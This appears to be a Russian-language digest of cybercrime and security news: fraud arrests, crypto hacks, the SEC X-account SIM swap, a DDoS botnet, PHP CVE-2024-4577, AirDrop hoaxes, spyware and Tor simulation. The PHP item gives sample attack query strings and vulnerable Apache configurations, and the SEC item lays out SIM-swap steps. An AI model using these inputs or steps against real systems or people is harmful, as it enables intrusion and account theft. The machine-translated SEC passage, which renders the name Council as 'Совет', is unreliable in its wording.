«Оперативниками Главного управления МВД России по г. Санкт-Петербургу и Ленинградской области совместно с коллегами из ОМВД России по Кировскому району Ленобласти задержана группа из четырех человек. Они подозреваются в серии мошеннических действий, от которых пострадали жители различных регионов России.
По версии следствия, в течение полутора лет задержанные вели криминальный бизнес с использованием высоких технологий. При помощи сообщников из одного государств ближнего зарубежья они создали не менее 25 интернет-магазинов, которые предлагали приобрести мобильные телефоны и аксессуары по ценам существенно ниже рыночных.
Злоумышленниками была заказана активная рекламная кампания, которая позволила продвинуть созданные ими сайты на первые позиции в выдачах поисковых систем и социальных сетях. За рубежом также был арендован кол-центр, сотрудники которого занимались оформлением заказов после звонков клиентов на телефоны интернет-магазинов.
В отправленных наложенным платежом почтовых отправлениях заказчикам дорогостоящей электроники приходили бывшие в употреблении телефоны, зарядные устройства, куски мыла и другие предметы, не имеющие отношения к оплаченному при получении товару. При этом из-за отсутствия в бандероли описи вложения оформить претензию на месте было невозможно.
Полицейскими предварительно установлена причастность задержанных к 23 эпизодам уголовных дел, возбужденных в различных регионах Российской Федерации. По оперативной информации участниками группы под видом заказов были отправлены не менее 670-ти посылок на сумму более 6,5 миллионов рублей.
По местам проживания задержанных проведены обыски, в ходе которых обнаружены и изъяты документы, почтовые квитанции, банковские карты, средства связи и иные предметы, имеющие доказательственное значение.
В настоящее время полицией проводятся оперативно-розыскные мероприятия и следственные действия, направленные на установление всех участников и эпизодов противоправной деятельности», - сообщила официальный представитель МВД России Ирина Волк.
Британская полиция конфисковала криптовалюту стоимостью более £180 млн (около $250 млн). Это самая крупная конфискация такого рода в истории Великобритании и одна из самых крупных в мире.
Согласно заявлению на сайте Службы столичной полиции Лондона, ответственной за обеспечение общественного порядка на территории Большого Лондона за исключением Сити, правоохранители конфисковали почти £180 млн в криптовалюте, превзойдя предыдущий рекорд, установленный полицией всего несколько недель назад.
Эта конфискация – одна из крупнейших в мире и превышает сумму конфискации на £114 млн (около $158 млн), произведенной полицией Лондона 24 июня. Изъятия были осуществлены детективом Управления по борьбе с экономическими преступлениями на основании разведывательных данных о передаче преступных активов. Полиция действовала в рамках международного расследования отмывания денег.
Как сообщают правоохранители, 39-летняя женщина была арестована 24 июня по подозрению в отмывании денег и вскоре выпущена под залог. 10 июля полицейские вновь провели ее допрос. В результате были изъяты £180 млн преступных доходов в криптовалюте. Сейчас расследование продолжается. Констебль криминальной полиции Джо Райан (Joe Ryan) сказал:
«Менее месяца назад мы успешно конфисковали £114 млн в криптовалюте. С тех пор наше расследование стало еще более сложным и разносторонним. Мы много работали, чтобы отследить эти деньги и выявить преступников, с которыми они могут быть связаны. Сегодняшний арест – еще одна важная веха в этом расследовании, которое будет продолжаться в течение нескольких месяцев, пока мы идентифицируем центральные фигуры этой операции по отмыванию денег».
Заместитель помощника комиссара Грэм Макналти (Graham McNulty) отметил, что доходы от преступной деятельности отмываются разными способами. В то время как наличные по-прежнему остаются предпочтительным инструментом среди преступников, по мере развития цифровых платформ полиция все чаще обнаруживает организованных преступников, использующих криптовалюту для отмывания денег.
«Если несколько лет назад это была довольно неизведанная территория, то теперь у нас есть хорошо обученные офицеры и специализированные подразделения, усердно работающие в этой области, чтобы быть на шаг впереди тех, кто использует криптовалюту для незаконной наживы», – отметил Макналти.
• Source: [https://news.met.police.uk/news/det...ency-seizure-worth-nearly- ps180million-431112](https://news.met.police.uk/news/detectives-break-record- in-new-cryptocurrency-seizure-worth-nearly-ps180million-431112)
Компания Vestrans сообщила о серьёзной хакерской атаке, в результате которой злоумышленник использовал уязвимость в контракте заблокированного стейкинга. Манипулируя механизмом вознаграждений, он получил 73 720 000 токенов $VSTR сверх положенного. После этого токены постепенно продавались на Uniswap, что привело к утрате ликвидности на сумму около $500 000 в ETH.
Для предотвращения дальнейших потерь команда Vestrans оперативно заблокировала контракты заблокированного стейкинга с помощью голосования четырёх из семи делегатов. Это решение остановило взаимодействие с контрактами, исключив из оборота 755 631 188 $VSTR, однако пользователи больше не могут вывести средства из заблокированных пулов.
В компании осознают влияние инцидента на пользователей и заверили, что все средства будут перераспределены среди их законных владельцев. В настоящее время команда работает над созданием плана решения проблемы, подробности которого обещают представить в ближайшие дни.
Представители Vestrans выразили благодарность сообществу за поддержку в этот сложный период. Компания гордится сплочённостью своих пользователей и намерена приложить все усилия для минимизации последствий атаки и стабилизации ситуации.
Несмотря на возникшую волатильность курса токена, Vestrans уверена, что положение вскоре стабилизируется. Компания продолжает реализовывать свою миссию по созданию устойчивого проекта на основе блокчейна Ethereum, подчёркивая его надёжность и потенциал.
Инцидент подчеркнул важность обеспечения безопасности в DeFi-сфере. Vestrans заявила, что стремится извлечь уроки из произошедшего и усилить защиту платформы, чтобы исключить подобные случаи в будущем.
ВАШИНГТОН – Эрик Каунсил-младший, 25 лет, из Афин, штат Алабама, был арестован сегодня утром в Афинах в связи с несанкционированным захватом в январе 2024 года аккаунта Комиссии по ценным бумагам и биржам США (SEC) X, ранее известного как Twitter, в котором хакеры разместили поддельное сообщение от председателя SEC, из-за которого стоимость биткоина (BTC) выросла на 1000 долларов. Ожидается, что Каунсил впервые выступит сегодня в Северном округе Алабамы.
Совет обвиняется в обвинительном заключении, раскрытом сегодня, в сговоре с целью совершения усугубленной кражи личных данных и мошенничества с устройствами доступа. Арест и обвинительное заключение были объявлены прокурором Соединенных Штатов Мэтью М. Грейвсом, первым заместителем помощника генерального прокурора Николь М. Арджентьери из уголовного отдела Министерства юстиции, исполняющим обязанности специального агента ФБР Дэвидом Гейстом из уголовного и киберотдела полевого офиса Вашингтона и генеральным инспектором SEC Деборой Джеффри.
Согласно обвинительному заключению, 9 января 2024 года Совет вступил в сговор с другими лицами с целью получения несанкционированного контроля над аккаунтом @SECGov X (иногда называемым аккаунтом SEC в Twitter) и передал поддельный пост от имени председателя SEC, в котором, в частности, содержалось ложное заявление о том, что «Сегодня SEC дает разрешение на листинг #Bitcoin ETF на всех зарегистрированных национальных фондовых биржах». Сразу после твита цена BTC выросла более чем на 1000 долларов за биткоин.
Вскоре после несанкционированного поста SEC восстановила контроль над их
аккаунтом X и подтвердила, что объявление было несанкционированным и стало
результатом нарушения безопасности. После этого корректирующего раскрытия
стоимость BTC снизилась более чем на 2000 долларов за биткоин. (В то время SEC
размышляла над тем, одобрять ли биржевые фонды (ETF), которые содержали
биткоины.) Несанкционированный субъект получил контроль над аккаунтом SEC X
через «обмен SIM-картами».
«В обвинительном заключении утверждается, что Эрик Каунсил-младший незаконно
получил доступ к счету SEC на X, используя украденную личность человека,
имевшего доступ к счету, чтобы завладеть его номером мобильного телефона», —
сказал первый заместитель помощника генерального прокурора Арджентьери. «Затем
сообщники Каунсил-младшего якобы использовали этот несанкционированный доступ
к счету X, чтобы ложно объявить, что SEC одобрила листинг биткоин-ETF, что
привело к росту цены биткоина на 1000 долларов, а затем падению на 2000
долларов. Обвинительное заключение Каунсил-младшего подчеркивает
приверженность Уголовного отдела борьбе с киберпреступностью, особенно когда
она угрожает целостности финансовых рынков».
Как описано в обвинительном заключении, Совет, который использовал такие онлайн-псевдонимы, как «Ronin», «Easymunny» и «AGiantSchnauzer», получил от сообщников персональные идентификационные данные (PII) и шаблон удостоверения личности, содержащий имя и фотографию жертвы. Затем Совет использовал свой принтер для удостоверений личности, чтобы создать поддельное удостоверение личности с этой информацией. Совет приступил к получению SIM-карты, привязанной к телефонной линии жертвы, предъявив поддельное удостоверение личности в магазине сотовой связи в Хантсвилле, штат Алабама. Затем он купил новый iPhone за наличные и использовал два предмета, чтобы получить коды доступа к учетной записи @SECGov X. Совет поделился этими кодами с членами заговора, которые затем получили доступ к учетной записи — и опубликовал мошеннический твит на учетной записи @SECGov X от имени председателя SEC, ложно объявив об одобрении SEC ETF BTC. Совет получил оплату в BTC за выполнение успешной замены SIM-карты. Вскоре после этого Совет поехал в Бирмингем, штат Алабама, чтобы вернуть iPhone, использованный при замене SIM- карты, за наличные.
Позже он провел интернет-поиск по запросам «взлом SECGOV», «подмена SIM-карты Telegram», «как я могу точно узнать, находится ли я под следствием ФБР» и «какие признаки того, что вы находитесь под следствием со стороны правоохранительных органов или ФБР, даже если они с вами не связывались.
Link: https://www.justice[.]gov/usao-dc/pr/fbi-arrests-alabama-man- january-2024-sec-x-hack-spiked-value-bitcoin
В июле 2024 года эксперты Positive Technologies отнесли к трендовым три уязвимости: в продукте для преобразования документов Ghostscript, в гиперконвергентной платформе Acronis Cyber Infrastructure, а также же в движке для обработки и отображения HTML-страниц Windows.
Уязвимость в движке для обработки и отображения HTML-страниц Windows MSHTML
Platform
CVE-2024-38112 (оценка по CVSS — 7,5)
Уязвимость, связанная с выполнением произвольного кода в гиперконвергентной
платформе Acronis Cyber Infrastructure (ACI)
CVE-2023-45249 (оценка по CVSS — 9,8)
Уязвимость в программном обеспечении для преобразования документов
Ghostscript, Artifex
CVE-2024-29510 (оценка по CVSS — 6,3)
Подробнее: https://www.securitylab.ru/news/550946.php
22 июня хакеры атаковали BtcTurk. Турецкая криптовалютная биржа приостановила депозиты и вывод активов до завершения расследования инцидента.
Согласно заявлению платформы, злоумышленники получили доступ к горячим кошелькам 10 разных криптовалют. Биржа остается платежеспособной. Холодные кошельки с большинством активов в безопасности.
Китайский журналист Колин Ву сообщил о проданных токенах Avalanche (AVAX) на сумму $54 млн. Ранее исследователь VeriDelisi идентифицировал адрес, с которого изначально перевели активы, как принадлежащий BtcTurk.
__https://twitter.com/x/status/1804499362611163646
По данным ончейн-сыщика ZachXBT, потери составили не менее 1,96 млн AVAX ($54,2 млн).
__https://twitter.com/x/status/1804477409179361679
Он зафиксировал вывод 587,75 BTC ($38,1 млн) с Coinbase и 122,66 BTC ($7,95 млн) с Binance вскоре после депозитов AVAX на криптовалютные биржи.
ZachXBT также сообщил о вероятном взломе онлайн-казино Sportsbet на сумму более $3,5 млн тем же хакером, поскольку средства от этих атак смешали.
CEO Binance Ричард Тенг сообщил о заморозке украденных средств на сумму $5,3 млн и помощи BtcTurk в расследовании.
__https://twitter.com/x/status/1804525525614096511
После взлома цена AVAX упала на 10%, с $27,2 до $24,5. На момент написания монета восстановилась к $25,7.
Подскочил пинг? Возможно, один из ваших соперников – латентный киберзлодей. В современном цифровом мире, где онлайн-игры занимают значительное место в жизни многих людей, киберпреступность не стоит на месте. Одним из наиболее распространённых видов атак на игровые серверы являются DDoS-атаки. Эти атаки способны вывести сервер из строя, сделав его недоступным для пользователей.
Недавно киберэксперты компании Sysdig раскрыли подробности о новом мощном инструменте, как раз предназначенном для таких атак. Набирающий популярность ботнет Rebirth, основанный на известном семействе вредоносного ПО Mirai, предлагает услуги DDoS-атак через Telegram и фирменный веб-магазин. Этот ботнет активно используется в игровом сообществе для атаки серверов и получения финансовой выгоды.
Наиболее доступный план, Rebirth Basic, стоит $15, в то время как тарифы Premium, Advanced и Diamond стоят $47, $55 и $73 соответственно. Также доступен план Rebirth API ACCESS за $53.
Вредоносное ПО Rebirth поддерживает функциональность для запуска DDoS-атак через протоколы TCP и UDP, такие как TCP ACK flood, TCP SYN flood и UDP flood.
Игровые серверы не впервые становятся мишенью для DDoS-ботнетов. Так, в декабре 2022 года Microsoft раскрыла подробности о другом ботнете под названием MCCrash, нацеленном на частные серверы Minecraft. А в мае 2023 года компания Akamai описала DDoS-ботнет Dark Frost, наблюдавшийся при атаках на игровые компании, хостинг-провайдеров игровых серверов, онлайн-стримеров и даже других участников игрового сообщества.
Специалисты Sysdig полагают, что потенциальные клиенты Rebirth могут использовать данный ботнет для DDoS-троллинга, при котором атаки запускаются против игровых серверов, чтобы нарушить опыт легитимных игроков.
«С помощью ботнета Rebirth человек может атаковать игровой сервер или других игроков в режиме реального времени, вызывая сбои и замедления игр, лаги и вылеты соединений», — сообщили в Sysdig.
«Такие атаки могут быть финансово выгодны некоторым создателям контента на стриминговых сервисах, чей доход зависит от набора подписчиков». Таким образом, недобросовестные стримеры могут «устранять конкурентов», повышая собственную популярность и заработок.
Кроме того, в марте этого года мы уже писали о громком взломе одного из киберспортсменов, участвующем в турнире по Apex Legends, которого взломали буквально в прямом эфире, на глазах тысяч зрителей. Тогда хакеры не преследовали финансовых целей, однако устроили знатный переполох в игровом сообществе.
Возвращаясь к бонету Rebirth, цепочки атак, распространяющие данное вредоносное ПО, включают эксплуатацию известных уязвимостей безопасности (например, CVE-2023-25717 ) для развёртывания скрипта bash, который впоследствии загружает и выполняет DDoS-ботнет в зависимости от архитектуры процессора.
Таким образом, киберпреступность в игровой индустрии представляет серьёзную угрозу, способную нарушить игровой процесс и нанести финансовый ущерб как игрокам, так и создателям контента.
DDoS-атаки с помощью вредоносных ботнетов, таких как Rebirth, давно предлагаются на теневом рынке и активно используются недобросовестными игроками для получения преимущества над соперниками или финансовой выгоды.
Всё это подчёркивает необходимость усиления кибербезопасности в игровой сфере, а также важность этичного поведения и уважения к другим участникам игрового сообщества. Только совместными усилиями можно противостоять этой угрозе и обеспечить честную и безопасную игровую среду для всех.
Подробнее: https://www.securitylab.ru/news/549151.php
В PHP [выявлена](https://devco.re/blog/2024/06/06/security-alert- cve-2024-4577-php-cgi-argument-injection-vulnerability-en/) уязвимость (CVE-2024-4577), позволяющая добиться выполнения своего кода на сервере или просмотра исходного кода PHP- скрипта в случае использования PHP в режиме CGI на платформе Windows (конфигурации с mod_php, php-fpm и FastCGI уязвимости не подвержены). Проблема устранена в выпусках PHP 8.3.8, 8.2.20 и 8.1.29.
Уязвимость является частным случаем исправленной в 2012 году проблемы CVE-2012-1823, добавленной для которой защиты оказалось недостаточно для блокирования атаки на платформе Windows. Метод атаки сводится к возможности подстановки аргумента командной строки при запуске интерпретатора PHP через манипуляцию с параметрами запроса к PHP-скрипту.
В старой уязвимости CVE-2012-1823 для эксплуатации достаточно было указать опции командной строки вместо параметров запроса, например, "http://localhost/index.php?-s" для показа исходного кода скрипта. Новая уязвимость основывается на том, что платформа Windows [обеспечивает](https://learn.microsoft.com/en- us/openspecs/windows_protocols/ms- ucoderef/d1980631-6401-428e-a49d-d71394be7da8) автоматическое преобразование символов, что позволяет для обхода ранее добавленной защиты указывать символы, присутствующие в некоторых кодировках и заменяемые на символ "-" (например, http://localhost/index.php?%ads).
Уязвимость подтверждена в конфигурациях с локалями для традиционного китайского (cp950), упрощённого китайского (cp936) и японского (cp932) языков, но не исключено её проявление и с другими локалями. Проблема проявляется в конфигурации по умолчанию в наборе XAMPP (Apache + MariaDB + PHP + Perl), а также в любых конфигурациях Apache, в которых php-cgi выставлен в качестве обработчика CGI-скриптов при помощи настройки 'Action cgi-script "/cgi- bin/php-cgi.exe"' или 'Action application/x-httpd-php-cgi "/php-cgi/php- cgi.exe"', или при непосредственном размещении интерпретатора php в "/cgi-bin" и любых других каталогах, в которых разрешено выполнение CGI-скриптов через директиву ScriptAlias.
Кроме того в обновлениях PHP 8.3.8, 8.2.20 и 8.1.29 устранены ещё три уязвимости:
• CVE-2024-5458 - возможность обхода фильтра FILTER_VALIDATE_URL, используемого при вызове функции filter_var.
• CVE-2024-5585 - альтернативный вектор атаки на уязвимость [CVE-2024-1874](https://github.com/php/php-src/security/advisories/GHSA- pc52-254m-w9w7), позволяющий обойти ранее добавленную защиту и осуществить подстановку команд при вызове bat- и cmd-файлов через функцию proc_open на платформе Windows (уязвимость BatBadBut).
• Подверженность функции openssl_private_decrypt атаке Marvin.
Оказывается, очень просто.
Функция iPhone стала орудием террора на борту самолета.
После взлета пассажиры на борту начали получать фотографии с изображением
бомбы, якобы установленной в самолете. Некий злоумышленник использовал функцию
AirDrop от
Apple, позволяющую отправлять
файлы на близлежащие устройства.
Пробыв в воздухе около 1 часа и 50 минут, самолет сменил курс и [безопасно приземлился](https://www.insider.com/passenger-southwest-flight-airdrop-bomb- threat-2023-7) в Международном аэропорту Окленда примерно в 12:49, по данным FlightAware.
Полицейские округа Аламеда встретили самолёт по прибытии и помогли с эвакуацией пассажиров. Специально обученных собак привлекли для тщательного обследования салона и около 300 чемоданов на борту. К счастью, во время поиска никаких подозрительных устройств не нашли.
Это далеко не первый случай злоупотребления функцией AirDrop на борту. Напомним, что в сентябре прошлого года командир самолета Southwest Airlines [угрожал](https://www.forbes.com/sites/suzannerowankelleher/2022/08/31/naked- pictures-southwest-pilot-airdrop/?sh=35c2760e7fd2) прервать взлет, если пассажиры не прекратят обмениваться непристойными фотографиями.
Другой инцидент произошел в феврале 2023 года, когда школьник привел в ужас пассажиров и [спровоцировал](https://appleinsider.com/articles/23/02/22/bomb- threats-made-via-airdrop-ground-flight) отмену рейса American Airlines, просто изменив имя своего iPhone на "У меня есть бомба" в настройках AirDrop.
Источник: https://www.securitylab.ru/news/539815.php
PS: это они еще не догадываются какие чудеса можно сделать при помощи обычной motorola c125 и ноутбука - которые абсолютно легально и без проблем можно пронести на борт в ручную кладь.
Северокорейские студенты, изучающие компьютерные науки, заняли первые места на хакерском конкурсе, организованном индийской компанией HackerEarth, базирующейся в Сан-Франциско.
Государственные СМИ сообщили, что студенты Политехнического университета имени Ким Чэка заняли первые места в соревновании « [May Circuits '23](https://www.hackerearth.com/challenges/new/competitive/may- circuits-23/#overview) », набрав максимальное количество баллов. А ещё один студент из Университета имени Ким Ир Сена занял десятое место.
Успехи студентов вызвали опасения в международном сообществе о возможном использовании их навыков для киберопераций Северной Кореи. Несмотря на закрытость страны и ограничения на выезд за рубеж, такие соревнования позволяют студентам улучшить свои навыки и получить опыт, который они не могут получить внутри страны.
[Турнирная таблица May Circuits '23](https://www.hackerearth.com/ru/challenges/competitive/may- circuits-23/leaderboard/).
Имена пользователей HackerEarth студентов Университета Ким Чэка начинаются с «KUT», за которым следует «icpc», аббревиатура Международного студенческого соревнования по программированию, в котором участвовали северокорейцы. Имена пользователей заканчиваются серийными номерами, что указывает на то, что учетные записи были созданы систематически, а не по индивидуальной инициативе.
Никнейм студента Университета имени Ким Ир Сена — «RNS», явная отсылка к горе Рённамсан в Пхеньяне, где расположен университет.
Эксперты отмечают, что участие студентов из Северной Кореи в международных хакерских конкурсах предоставляет редкую возможность наблюдать за образованием компьютерных наук в стране и помогает студентам познакомиться с внешним миром. Однако это также вызывает вопросы о целях страны, так как Северная Корея в последние годы усилила свои кибератаки.
Международное сообщество обеспокоено тем, что северокорейские студенты могут использовать свои навыки в незаконных кибератаках, направленных на кражу средств и информации. Однако некоторые эксперты также указывают на возможность использования навыков для позитивных целей, таких как улучшение здравоохранения, образования и других гражданских технологий.
Важно отметить, что хакерский конкурс HackerEarth наградил победителей купонами Amazon на общую сумму $225. Однако не ясно, как эти купоны будут переданы студентам из Северной Кореи, так как США стремятся предотвратить финансирование Северной Кореи из-за границы.
Несмотря на возможные риски, участие студентов из Северной Кореи в подобных конкурсах свидетельствует о стремлении развивать их навыки программирования и быть в курсе последних тенденций в области кибербезопасности. Участие также подчеркивает важность обмена знаниями и опытом между странами для более глобального понимания и сотрудничества в сфере информационной безопасности.
Согласно данным Министерства внутренних дел Великобритании, мошенничество является самым распространенным преступлением в стране, составляя 41% всех правонарушений. Ежегодно каждый пятнадцатый человек становится жертвой аферы.
В целях борьбы с правонарушениями подобного рода премьер-министр Великобритании Риши Сунак объявил о создании национальной группы по борьбе с мошенничеством, куда войдут 500 следователей-специалистов, пишет The Times. Одним из первых пунктов новой стратегии станет запрет холодные звонки — обзвон менеджером по продажам всех потенциальных клиентов с целью предложения им определенных товаров и услуг. Запрет коснется тех компаний, которые предлагают финансовые продукты, например страхование или участие в криптовалютной схеме, поскольку преступники чаще всего маскируются именно под такие фирмы. Предполагается, что нововведение вместе с предупреждающей рекламой поможет обезопасить людей.
Также правительство запретит сим-фермы — устройства, осуществляющие отправку СМС-рассылок с обычных сим-карт. Мошенники часто используют эту схему, чтобы рассылать сообщения с требованием внести предоплату,— с начала пандемии число таких финансовых преступлений выросло в восемь раз, до 454 тыс. случаев. Кроме того, министерство планирует инвестировать 30 млн фунтов в модернизацию службы Action Fraud. Она была создана для помощи жертвам мошенничества, однако источники сообщают, что в последнее время операторы службы все реже рассматривают дела и неуважительно относятся к пострадавшим. Власти собираются упростить процедуру подачи заявлений о мошенничестве через интернет и создать онлайн-портал, позволяющий жертвам отслеживать ход их дела в режиме реального времени.
source:
thetimes.co.uk/article/cold-calling-ban-to-fight-financial-fraudsters-
tf0jb52fm
gov.uk/government/consultations/preventing-the-use-of-sim-farms-for-
fraud/preventing-the-use-of-sim-farms-for-fraud-consultation-accessible
Полиция американского города Бейонн (штат Нью-Джерси) арестовала двух начинающих кардеров, которые реализовали схему мошенничества с подарочными карточками. Портал Daily Voice уточняет, что расследование кражи денег заняло у полиции всего неделю.
Мошенниками оказались двое жителей Балтимора (штат Мэриленд) — 31-летний Некулаи Канде (Neculai Candet) и 41-летняя Мадалина Бальмус (Madalina Balmus), которые уже взяты под стражу. Первые сообщения о краже денег поступили от местного жителя. С его карты четырьмя транзакциями в двух разных банкоматах были выведены 560 долларов. Позже в этот же день были сняты еще 200 и 343 доллара с подарочных карточек двух других человек, но снова в тех же банкоматах.
В итоге полицейские просто начали дежурить в этих двух точках, и вскоре были вознаграждены за терпение. Когда силовики подошли к показавшемуся им подозрительным Канде, тот попытался сбросить в кусты 23 карты Visa. При нем также были обнаружены шесть квитанций о снятии средств из банкоматов. Расследование показало, что подарочные карты были перепрограммированы с использованием реальных номеров счетов дебетовых карт и новых пин-кодов, связанных с банковскими счетами жертв.
source: dailyvoice.com/new-jersey/union/gift-card-fraud-two-arrested-in- bayonne
Поставщик предоставлял свои программы сторонним компаниям, чтобы они могли отслеживать действия чужих людей.
Генеральная прокуратура Нью-Йорка оштрафовала на сумму $410 000 разработчика шпионского ПО Патрика Хинчи, который с помощью 16 компаний незаконно продвигал свои инструменты наблюдения.
Прокуратура также обязала Патрика Хинчи изменить методы маркетинга своих продуктов и информировать владельцев устройств о том, что их телефоны тайно отслеживаются с помощью одного из его многочисленных приложений – Auto Forward, Easy Spy, DDI Utilities, Highster Mobile, PhoneSpector, Surepoint и TurboSpy.
Хинчи предоставляд компаниям-клиентам свои шпионские программы, которые позволяют отслеживать телефоны других людей без ведома пользователей. В некоторых случаях они также используются для мониторинга онлайн-активности целей и сбора конфиденциальной информации о пользователях, которая впоследствии может быть использована для шантажа или различных других злонамеренных целей.
Эти приложения для наблюдения позволили клиентам Хинчи тайно отслеживать действия других людей на своих мобильных устройствах, включая:
Согласно соглашению , некоторые приложения также позволяли пользователю удаленно активировать камеру или микрофон целевого устройства. По словам генерального прокурора, приложения копируют информацию с устройства и передают ее на серверы компании, где она доступна клиенту. Другая услуга позволяет клиентам эксфильтровать данные с целевого сервера iCloud, если у клиента есть доступ к данным для входа.
Для рекламы своих программ разработчик создал якобы независимые веб-сайты с обзорами продуктов, на которых публиковались восторженные отзывы о преимуществах использования шпионского ПО. В одном сообщении в блоге утверждалось, что приложение PhoneSpector «позволяет клиенту отслеживать всю телефонную активность целевого пользователя без риска быть уличенным в шпионаже».
Рекламные публикации в Facebook*
В маркетинговых материалах не упоминалось, что в США, как и в большинстве стран мира, незаконно получать доступ и контролировать постороннее устройство без согласия его владельца.
Несмотря на продвижение шпионских продуктов, на странице условий и положений на большинстве маркетинговых веб-сайтов указывается, что такое использование нарушает законы штата Нью-Йорк и федеральные законы. Несмотря на незаконность слежки без согласия, сами продукты остаются доступными, в том числе для наблюдения за устройством несовершеннолетнего без его согласия.
source: ag.ny.gov/sites/default/files/ilf-nyag_aod.pdf
Неизвестным удалось взломать межсетевой мост проекта децентрализованных финансов Nomad и полностью опустошить его. Специалисты назвали атаку «наиболее хаотическим взломом» в отрасли.
В смарт-контракте моста Nomad находилось различных токенов на $190.7 млн. Утром среды, 2 августа, хакерам удалось вывести практически все, в смарт- контракте оставалось активов примерно на $650. При этом опустошали мост с помощью множества транзакций и, похоже, в атаке участвовало как минимум несколько людей.
По данным специалиста по компьютерной безопасности под псевдонимом saczsun, в ходе обычного минорного обновления смарт-контракта разработчики допустили ошибку, в результате которой автоматически одобрялась почти любая посланная в контракт транзакция. В результате злоумышленникам не нужно было хорошо знать язык программирования Solidity или разбираться в информационной безопасности. По сути, любой человек мог взять уже прошедшую транзакцию, поменять в ней адрес получателя на свой и отправить в контракт.
Разработчики сообщили, что исследуют проблему и позднее предоставят более подробную информацию. Впрочем, учитывая, что проект был полностью опустошен, вряд ли пользователей, потерявших средства, это утешит.
Злоумышленники вывели токены WBTC, WETH, USDC, FRAX, CQT, HBOT, IAG, DAI, GERO, CARDS, SDL и C3 из межсетевого моста Nomad. Он позволял обменивать токены между сетями Эфириума, Avalanche, Evmos, Mikomeda C1 и Moonbeam.
Всего несколько дней назад проект Nomad собрал более $22 млн финансирования от различных компаний, включая Coinbase Ventures и OpenSea. Капитализация проекта достигла $225 млн.
Исследователи из университета Уотерлу и Исследовательской лаборатории Военно- морского флота США [представили](https://blog.torproject.org/new-foundations- tor-network-experimentation/) результаты разработки симулятора сети Tor, сравнимого по числу узлов и пользователей с основной сетью Tor и позволяющего проводить эксперименты, приближенные к реальным условиям. Подготовленный в ходе эксперимента инструментарий и методология моделирования сети позволили на компьютере с 4 ТБ ОЗУ симулировать работу сети из 6489 узлов Tor, к которой одновременно подключено 792 тысячи виртуальных пользователей.
Отмечается, что это первая полномасштабная симуляция сети Tor, число узлов в которой соответствует реальной сети (рабочая сеть Tor насчитывает около 6 тысяч узлов и [2 млн подключённых пользователей](https://metrics.torproject.org/userstats-relay- country.html)). Полноценная симуляция сети Tor представляет интерес с точки зрения выявления узких мест, моделирования поведения в результате атак, обкатки новых методов оптимизации в реальных условиях и проверки концепций, связанных с обеспечением безопасности.
При наличии полноценного симулятора разработчики Tor смогут уйти от практики проведения [экспериментов](https://status.torproject.org/affected/network- experiments/) в основной сети или на отдельных рабочих узлах, которые создают дополнительные риски нарушения конфиденциальности пользователей и не исключают возникновение сбоев. Например, в ближайшие месяцы ожидается внедрение в Tor поддержки [нового протокола](https://gitlab.torproject.org/tpo/core/torspec/-/blob/main/proposals/324-rtt- congestion-control.txt) управления перегрузкой и симуляция позволит полноценно изучить его работу до развёртывания в реальной сети.
Кроме исключения влияния экспериментов на конфиденциальность и надёжность работы основной сети Tor наличие отдельных тестовых сетей даст возможность оперативно тестировать и отлаживать новый код в процессе разработки, сразу внедрять изменения для всех узлов и пользователей без ожидания завершения длительных промежуточных внедрений, более оперативно создавать и обкатывать прототипы с реализацией новых идей.
Ведётся работа по усовершенствованию инструментария, которая, как заявлено разработчиками, сократит потребление ресурсов в 10 раз и позволит на том же оборудовании симулировать работу сетей, превосходящих реальную сеть, что может потребоваться для выявления возможных проблем с масштабированием Tor. В ходе работы также создано несколько новых методов моделирования сети, позволяющих прогнозировать изменение состояние сети во времени и использовать фоновые генераторы трафика для симуляции активности пользователей.
Исследователями также изучена закономерность между размером симулируемой сети и достоверностью проецирования результатов экспериментов на реальную сеть. В ходе разработки Tor предварительная проверка вносимых изменений и оптимизаций производится в небольших тестовых сетях, которые содержат значительно меньше узлов и пользователей, чем реальная сеть. Выявлено, что статистические погрешности прогнозов, полученных при проведении небольших симуляций, можно компенсировать за счёт многократного повторения независимых экспериментов с разными наборами исходных данных, при том, что чем больше симулируемая сеть, тем меньше повторных испытаний требуется для получения статистически значимых выводов.
Для моделирования и симуляции сети Tor исследователями развивается несколько открытых проектов, распространяемых под лицензией BSD:
• Shadow - универсальный симулятор сети, позволяющий запускать код настоящих сетевых приложений для воссоздания работы распределённых систем с тысячами сетевых процессов. Для симуляции систем на базе реальных немодифицированных приложений в Shadow применяется техника эмуляции системных вызовов. Сетевое взаимодействие приложений в симулированном окружении осуществляется через развёртывание VPN и использование симуляторов типовых сетевых протоколов (TCP, UDP). Поддерживается настраиваемое моделирование характеристик виртуальной сети, таких как потеря пакетов и задержки при доставке. Кроме экспериментов с Tor была предпринята попытка разработки плагина к Shadow для симуляции сети Bitcoin, но данный проект не получил развития.
• Tornettools - инструментарий для генерации реалистичных моделей сети Tor, которые могут быть запущены в окружении Shadow, а также для запуска и настройки процесса симуляции, накопления и визуализации результатов. В качестве шаблонов для генерации сети могут использоваться метрики, отражающие работу реальной сети Tor.
• TGen - генератор потоков трафика на основе параметров, заданных пользователем (размер, задержки, число потоков и т.п.). Схемы формирования трафика могут задаваться как на основе специальных сценариев в формате GraphML, так и при помощи вероятностных Марковских моделей распределения TCP-потоков и пакетов.
• OnionTrace - инструментарий для отслеживания производительности и событий в симулируемой сети Tor, а также для записи и воспроизведения сведений о формировании цепочек узлов Tor и привязки к ним потоков трафика.
Россия одержала победу в мировом чемпионате по программированию ICPC. Первое место взяли студенты Нижегородского госуниверситета им. Н. И. Лобачевского. Россия победила в этом соревновании в восьмой раз подряд – с 2013 г. первые места доставались ей, за исключением 2020 г., когда ICPC был отменен из-за коронавируса.
Российские программисты лучше всех
Студенты Нижегородского госуниверситета им. Н. И. Лобачевского одержали победу во всемирном чемпионате по программированию среди университетских команд ICPC (International Collegiate Programming Contest). Финал мероприятия прошел в Москве 5 октября 2021 г.
Команда-победитель состоит из трех участников. Россию к победе привели Алексей Данилюк, Валерия Рябчикова и Николай Калинин. Тренерами команды выступили Алексей Шмелев и Владислав Епифанов. Руководитель команды – Николай Борисов.
Согласно правилам чемпионата, призовые места присуждаются 12 командам, а первенство определяется по количеству набранных в ходе соревнования очков. Российские программисты получили три золотых медали из четырех – третье место взяла команда Санкт-Петербургского ИТМО, а на четвертой строчке расположился столичный МФТИ. Второе место удержала команда из Сеульского госуниверситета (Южная Корея).
Сотни претендентов
В прошедшем в Москве финале ICPC должны были участвовать команды 173 из 63 стран мира. Российская «сборная» в итоге оказалась наиболее многочисленной – страну на соревнованиях представляли 15 команд. Столько же было только у Индии, а затем следовали США (14 команд), Бразилия (девять команд) и Южная Корея (шесть команд).
